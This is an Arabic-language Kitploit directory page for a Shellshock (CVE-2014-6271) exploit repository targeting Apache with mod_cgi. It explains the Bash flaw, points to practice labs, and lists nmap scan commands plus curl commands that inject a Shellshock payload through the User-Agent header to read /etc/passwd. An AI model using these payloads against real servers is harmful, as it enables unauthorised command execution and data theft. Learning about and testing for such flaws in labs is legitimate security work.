Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2014-6271 — استغلال ثغرة "Shellshock". تنفيذ أكواد عن بُعد في Apache باستخدام mod_cgi | Kitploit
أدوات/GitHubGitHub/j0hnth3kn1ght/cve-2014-6271
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubj0hnth3kn1ght/cve-2014-6271

CVE-2014-6271

استغلال ثغرة "Shellshock". تنفيذ أكواد عن بُعد في Apache باستخدام mod_cgi

عرض المستودع
5منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال ثغرة شلشوك (CVE-2014-6271)

شلشوك هي ثغرة تنفيذ أوامر عن بُعد في BASH. يستغل هذا السكريبت الثغرة في بيئة الويب على Apache أو ما يشابهه مع تمكين mod_cgi. تكمن الثغرة في معالجة متغيرات البيئة، وهي قيم مسماة ديناميكية تؤثر على كيفية تشغيل العمليات على الحاسوب. يمكن للمهاجمين استغلال ذلك بإرفاق كود ضار بمتغيرات البيئة، والذي يتم تنفيذه عند استقبال المتغير. وهذا يسمح للمهاجمين باختراق النظام المحتمل.

معمل لاختبار الثغرة

  • PentesterLab

  • VulnHub

  • TryHackMe

    Vídeo2

البحث عن صفحات CGI-BIN:

root@kitploit:~
$ nmap 192.168.x.x --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
$ nmap -sV -p- --script http-shellshock 192.168.x.x
$ nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.x.x

اختبار يدوي:

root@kitploit:~
sudo curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" <WEBSERVER-IP>
sudo curl -A "() { :;}; echo Content-Type: text/html; echo; /bin/cat /etc/passwd;" <WEBSERVER-IP>

تحذير:

أنا لست مسؤولاً عن أي استخدام غير قانوني أو ضرر ناتج عن هذه الأداة. كُتبت للمتعة وليس للشر، وتهدف إلى زيادة الوعي حول القرصنة والأمن السيبراني

قرصنة موفقة :)

تنزيل الأداة